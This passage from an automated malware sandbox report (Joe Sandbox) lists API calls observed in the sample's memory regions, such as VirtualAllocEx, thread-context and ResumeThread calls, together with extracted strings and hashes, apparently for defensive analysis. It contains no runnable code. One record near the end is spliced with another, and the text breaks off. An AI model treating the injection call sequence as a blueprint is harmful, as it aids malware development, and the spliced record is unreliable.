                                                        • Snapshot File: hcaresult_10_2_6ed0000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID: ContextThreadWow64
                                                        • String ID:
                                                        • API String ID: 983334009-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 007FE22F
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1761249544.00000000007F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_7f0000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID: DuplicateHandle
                                                        • String ID:
                                                        • API String ID: 3793708945-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,007FBF99,00000800,00000000,00000000), ref: 007FC1AA
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1761249544.00000000007F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_7f0000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID:
                                                        • API String ID: 1029625771-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06ED59D6
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1769554852.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6ed0000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID: AllocVirtual
                                                        • String ID:
                                                        • API String ID: 4275171209-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06ED59D6
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1769554852.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6ed0000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID: AllocVirtual
                                                        • String ID:
                                                        • API String ID: 4275171209-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,007FBF99,00000800,00000000,00000000), ref: 007FC1AA
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1761249544.00000000007F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_7f0000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID:
                                                        • API String ID: 1029625771-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1769554852.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6ed0000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID: ResumeThread
                                                        • String ID:
                                                        • API String ID: 947044025-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1769554852.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6ed0000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID: ResumeThread
                                                        • String ID:
                                                        • API String ID: 947044025-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • PostMessageW.USER32(?,00000010,00000000,?), ref: 06EDA97D
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1769554852.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6ed0000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID: MessagePost
                                                        • String ID:
                                                        • API String ID: 410705778-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • PostMessageW.USER32(?,00000010,00000000,?), ref: 06EDA97D
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1769554852.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6ed0000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID: MessagePost
                                                        • String ID:
                                                        • API String ID: 410705778-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 007FBF1E
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1761249544.00000000007F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_7f0000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID: HandleModule
                                                        • String ID:
                                                        • API String ID: 4139908857-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1768906730.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6a10000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Hbq
                                                        • API String ID: 0-1245868
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1769219286.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6d30000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Te^q
                                                        • API String ID: 0-671973202
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1768906730.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6a10000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: PH^q
                                                        • API String ID: 0-2549759414
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1768906730.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6a10000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: PH^q
                                                        • API String ID: 0-2549759414
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1768906730.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6a10000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: (bq
                                                        • API String ID: 0-149360118
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1768906730.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6a10000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: (bq
                                                        • API String ID: 0-149360118
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1769219286.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6d30000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: O};5
                                                        • API String ID: 0-3558557551
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1768906730.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6a10000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Te^q
                                                        • API String ID: 0-671973202
                                                        • Opcode ID: 5942296f30994c21e23283e38282075c890f567cc0ec8255c98dc1ba111275a4
                                                        • Instruction ID: b811863d9180a4405d3c6061e1b0064140cb0178720c4f3529bed0c28471c384
                                                        • Opcode Fuzzy Hash: 5942296f30994c21e23283e38282075c890f567cc0ec8255c98dc1ba111275a4
                                                        • Instruction Fuzzy Hash: 63315C74E05248CFDB44DFAAC4456EEBBF6AF89300F14802AD419AF354DB345906CF90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1768906730.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6a10000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Te^q
                                                        • API String ID: 0-671973202
                                                        • Opcode ID: 2887c698ccfda54acbf8a100169a0995a5b2455e55dab78c9a33c0f12924e36d
                                                        • Instruction ID: dea95f48c9d4210a6f416962d332aedf54dbe769b2f9246623e5677f18a362de
                                                        • Opcode Fuzzy Hash: 2887c698ccfda54acbf8a100169a0995a5b2455e55dab78c9a33c0f12924e36d
                                                        • Instruction Fuzzy Hash: F931F474E04248CFDB48DFEAC5446AEFBF6AF89300F10802AD419AB358DB345906CF80
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1769219286.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6d30000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 8bq
                                                        • API String ID: 0-187764589
                                                        • Opcode ID: 9c2445df45e24092eba2be7419077d72a143a0ae5f1bb28ddc52314bb9095b51
                                                        • Instruction ID: 1efffcdc88623fb4ed3d84e36c472ff5f246c1cf62c059f827076b8b646d2260
                                                        • Opcode Fuzzy Hash: 9c2445df45e24092eba2be7419077d72a143a0ae5f1bb28ddc52314bb9095b51
                                                        • Instruction Fuzzy Hash: 363125B4E04219CFDB84EFA9D944AAEBBF6FB49300F108029D556B7354DB345A45CFA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1768906730.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6a10000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 8bq
                                                        • API String ID: 0-187764589
                                                        • Opcode ID: a2fd50ca8e4977037a37da1098dad465a69dc2458f9b7c2b98816d72a5e29b61
                                                        • Instruction ID: 927ce23a8a58d11ef9eeefa01cd5dffd4438c8d210830bc4bcdc51ee4e3d9ee6
                                                        • Opcode Fuzzy Hash: a2fd50ca8e4977037a37da1098dad465a69dc2458f9b7c2b98816d72a5e29b61
                                                        • Instruction Fuzzy Hash: 01215E78E08249CFCB00DFA8D5508EEBBF1FB4E304B104566D519AB3A5E7345A06CFA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1769219286.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6d30000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Te^q
                                                        • API String ID: 0-671973202
                                                        • Opcode ID: 4e0670163de0e1dfbc71f2354edbfd96748ae3bfb6bbccafe865f9eb0a899cfd
                                                        • Instruction ID: e379f4caa785bc63acbe8acc563cf45b8a2efd086710eba704b93f00def835ec
                                                        • Opcode Fuzzy Hash: 4e0670163de0e1dfbc71f2354edbfd96748ae3bfb6bbccafe865f9eb0a899cfd
                                                        • Instruction Fuzzy Hash: 8E112131F002199BCB54EBB9D9105EEB7F6AF85250B20406AC505E7344EB358D06CBE1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1768906730.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6a10000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Te^q
                                                        • API String ID: 0-671973202
                                                        • Opcode ID: d070b165f6eef825478772a7417263ba0c0fdd3e3dbbfdb275c84099b3f48e49
                                                        • Instruction ID: ddc3b7ab0ae597332db4aecfdf552ef4d76e6e954f9295ae309ed67f337ea1dc
                                                        • Opcode Fuzzy Hash: d070b165f6eef825478772a7417263ba0c0fdd3e3dbbfdb275c84099b3f48e49
                                                        • Instruction Fuzzy Hash: AF114F75E00219DFCF08DFE9D8849ADBBB2FB88310F10812AEA19AB365C7356955CF50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1768906730.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6a10000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: eb715300ac79195902046085f0a330d82ce4d1120e5c52848b7968a96f70591c
                                                        • Instruction ID: 2c856b7ab0e1f579e771a08b904126abba1e6dc2a7864e1ebc813f2bbffb84cb
                                                        • Opcode Fuzzy Hash: eb715300ac79195902046085f0a330d82ce4d1120e5c52848b7968a96f70591c
                                                        • Instruction Fuzzy Hash: 2202E434A40104DFDB54EF68D598AADBBF2BF89314F1581A8E4099F366CB35EC85CB50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1769219286.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6d30000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 326097b077e22b647f9793c21859244c72225da72b3e1cdfde8de1944e6ab9d4
                                                        • Instruction ID: 9cb4d3223b1cb9f078da6f72bb68b352b47efc07094aaa0eef83e00e482e0f59
                                                        • Opcode Fuzzy Hash: 326097b077e22b647f9793c21859244c72225da72b3e1cdfde8de1944e6ab9d4
                                                        • Instruction Fuzzy Hash: 516138B4D0921DDFDF48CFA9D444AEEBBB6EF49300F109029E519AB215D7709946CF80
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1769219286.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6d30000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 091a83a222de7102b4dbaeba1368e7ec134ba948e782b9e54633b28fb450ff7b
                                                        • Instruction ID: b305350b344212f51294130c781b775f3b1fd30444e46a76a24b16d7725bf772
                                                        • Opcode Fuzzy Hash: 091a83a222de7102b4dbaeba1368e7ec134ba948e782b9e54633b28fb450ff7b
                                                        • Instruction Fuzzy Hash: 45611A31A00619DFDB54DFA9C454A9DBBF1FF88310F21815AE509AB3A0DB71ED45CB80
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1768906730.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6a10000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 75c67b9889e71675b81df7a22db30fb73e8d7bc84702afd33a4997ff8a2cff85
                                                        • Instruction ID: d39061b4f38a30c1cacfa6853a9d56dd93de0ffa1d5cbca58934ada18310014a
                                                        • Opcode Fuzzy Hash: 75c67b9889e71675b81df7a22db30fb73e8d7bc84702afd33a4997ff8a2cff85
                                                        • Instruction Fuzzy Hash: 6A418C70E09258DFEB48DBAAD8446EEBBF6FF8C310F14D029E409AB251D7384941CB94
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1768906730.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6a10000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 3afeefb9d28705279d42e84bb525054f24cd24ef9a23c6bb24b35d4586109a76
                                                        • Instruction ID: 9ed9218de8ad9310cfa4a87d03afa85e2dce895f9ff5964bc5eb46af57b0e68d
                                                        • Opcode Fuzzy Hash: 3afeefb9d28705279d42e84bb525054f24cd24ef9a23c6bb24b35d4586109a76
                                                        • Instruction Fuzzy Hash: D841A230700601CFDBA5AB28C894B7EB3B2BF85714F148569D256CF6A1CB75AC46CB91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1768906730.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6a10000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 48da5849b0d443724b1aee14922472eff8b0b66a91ab28a41d0afac5d44a3201
                                                        • Instruction ID: 0e5ba4f50fd112829554dbfdbcaf0d9a55209c09ff048d9d3ee557304bec800e
                                                        • Opcode Fuzzy Hash: 48da5849b0d443724b1aee14922472eff8b0b66a91ab28a41d0afac5d44a3201
                                                        • Instruction Fuzzy Hash: EF417F307106019FDBA4AB28C894B7EB3B2BF85714F108529D216CF7A4DB71EC46CB91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1768906730.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6a10000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 236a65e1d703ad191adba810f1474fc62110c8c413d239c9b44128ea59e94079
                                                        • Instruction ID: aff3a651d5c1e165a24b666a36d9f3c98261a3ca620f55b8ae7b56a4ab0d0c2b
                                                        • Opcode Fuzzy Hash: 236a65e1d703ad191adba810f1474fc62110c8c413d239c9b44128ea59e94079
                                                        • Instruction Fuzzy Hash: E9413E70E102088BDF44EBA9D498AEEBBF2BF88700F14C566E411AB354DB349C04CB94
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1768906730.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6a10000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 530dd9177830594b482b072a7574c6d195a227aee1d07372e1e9cc188eb15de4
                                                        • Instruction ID: eb62442ffd961c8333323fc27aab3d9695ed728c694ac74048d415eb6a30ff0f
                                                        • Opcode Fuzzy Hash: 530dd9177830594b482b072a7574c6d195a227aee1d07372e1e9cc188eb15de4
                                                        • Instruction Fuzzy Hash: 1A312C347106148FD798EB29C884B69B3A6BF89614F1580A9E619CF371DF31ED81CBA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1768906730.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6a10000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: db0bf629fc001bc09afdc7bb6c26f7810efabf03814c95eceb8e5dbec224b7f5
                                                        • Instruction ID: cdec8187ce84094da88937eddde79a5cc29d3e6516f374ef445430422b2ceec5
                                                        • Opcode Fuzzy Hash: db0bf629fc001bc09afdc7bb6c26f7810efabf03814c95eceb8e5dbec224b7f5
                                                        • Instruction Fuzzy Hash: 3E3128757002149FCB54EF68C984AAEBBB6FF88320B1142A9E5259F2B1CB71DD41CB90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1768906730.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6a10000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a6de45694f1a98b06610cd34af90eea0052a4fae943794f4581c4cf05b6e4d4e
                                                        • Instruction ID: b4bd8d71cfef34f9d810dd65b6b3a90a630845bd8126f9b7e57974f252de784e
                                                        • Opcode Fuzzy Hash: a6de45694f1a98b06610cd34af90eea0052a4fae943794f4581c4cf05b6e4d4e
                                                        • Instruction Fuzzy Hash: 4E316C75B042149FCB14EF68C988AADBBB6FF88320F1142A9E5258F2B1C771DD01CB90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1768906730.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6a10000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 281043bbde0b68264169967e73d6966d3e0cf68fc89810373e01f0187a61fce7
                                                        • Instruction ID: 3d9bdbb0182838bc568519000751aa5a10420bcd41885195565d79057c128740
                                                        • Opcode Fuzzy Hash: 281043bbde0b68264169967e73d6966d3e0cf68fc89810373e01f0187a61fce7
                                                        • Instruction Fuzzy Hash: 6A312A347105008FD754EB28C884BA977A5BF89614F1580A9E65ACF371DB35ED86CB60
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1768906730.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6a10000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 6af3417dca397035479d67d6b0056f4cf38f15ecedce063eb33a3d642e00c510
                                                        • Instruction ID: 0f75bd659cbf057c892a0fb26779f527a8c28180f7fc65bdf7192bef4bcafef9
                                                        • Opcode Fuzzy Hash: 6af3417dca397035479d67d6b0056f4cf38f15ecedce063eb33a3d642e00c510
                                                        • Instruction Fuzzy Hash: 44316B74E44108DFDB44EFA9D084AEEBBF6EB88320F109069D426AB354DB359945CF90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1768906730.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6a10000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ba1d2ae9fe5d3481a948a9d1d82faf191f9886cba866645c2c5f2883f7404a42
                                                        • Instruction ID: 546a514f557819d16ac39ef94800440ca27160898a23a23370afad687b06de15
                                                        • Opcode Fuzzy Hash: ba1d2ae9fe5d3481a948a9d1d82faf191f9886cba866645c2c5f2883f7404a42
                                                        • Instruction Fuzzy Hash: 1F314E306406108FDBA4EF28C888B9677A5FF84724F50C569E55A8F3B1DF71E88ACB40
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1768906730.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6a10000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0be244405bac35823cac96889a05017467dc75339758c80329cd89382ab4d86c
                                                        • Instruction ID: a9b1402f25a43b548e01d8f4c4b4f8dec89d45ddcb5f3584cbee6ee57c2dca45
                                                        • Opcode Fuzzy Hash: 0be244405bac35823cac96889a05017467dc75339758c80329cd89382ab4d86c
                                                        • Instruction Fuzzy Hash: 7D216234B401048F9B997B399A5873E2AD79FCA6407194029D906CF3D8EF24CF86C7E6
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1768906730.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6a10000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 8ff000579c1e8599b56ec1ed8f0ea378deaf8f8292373473c55a4ba5894f8112
                                                        • API String ID:
                                                        • Opcode ID: 45a5e1d96917fc2c8fd1c319822730c53a4a9df53a9a51a7f562b7ff950e9d00
                                                        • Instruction ID: d354a79c5b8d682f55c5a26c78a8d241a76c0ce93241dcc6df72994d0fbd18f2
                                                        • Opcode Fuzzy Hash: 45a5e1d96917fc2c8fd1c319822730c53a4a9df53a9a51a7f562b7ff950e9d00
                                                        • Instruction Fuzzy Hash: AA01D4316042808FC762A738C9947AA3FF5EF82244F0A00EAC1D5CF266DA24EC96C795
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1768906730.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6a10000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 3596337a1d98eab6d90cc52dd65dcdf8bfc3467cd304ac5605aedda091017958
                                                        • Instruction ID: 0328ed39ad589d06ee11cb9b49422396dca345fa738871f71f1cb4eba1f12d61
                                                        • Opcode Fuzzy Hash: 3596337a1d98eab6d90cc52dd65dcdf8bfc3467cd304ac5605aedda091017958
                                                        • Instruction Fuzzy Hash: 200144326083418FEB64DB24D4807BABBF9AF44214F04406DC08A8F262CE35E847CB80
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1768906730.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6a10000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f9ccc5ee0f743eb0773189a8b35eba863ad92f45426446c7d8a301e8eea92524
                                                        • Instruction ID: 57efbae37b4a2d575d5e74b92c21a73836e46902f70e393392b915a5238e8a5b
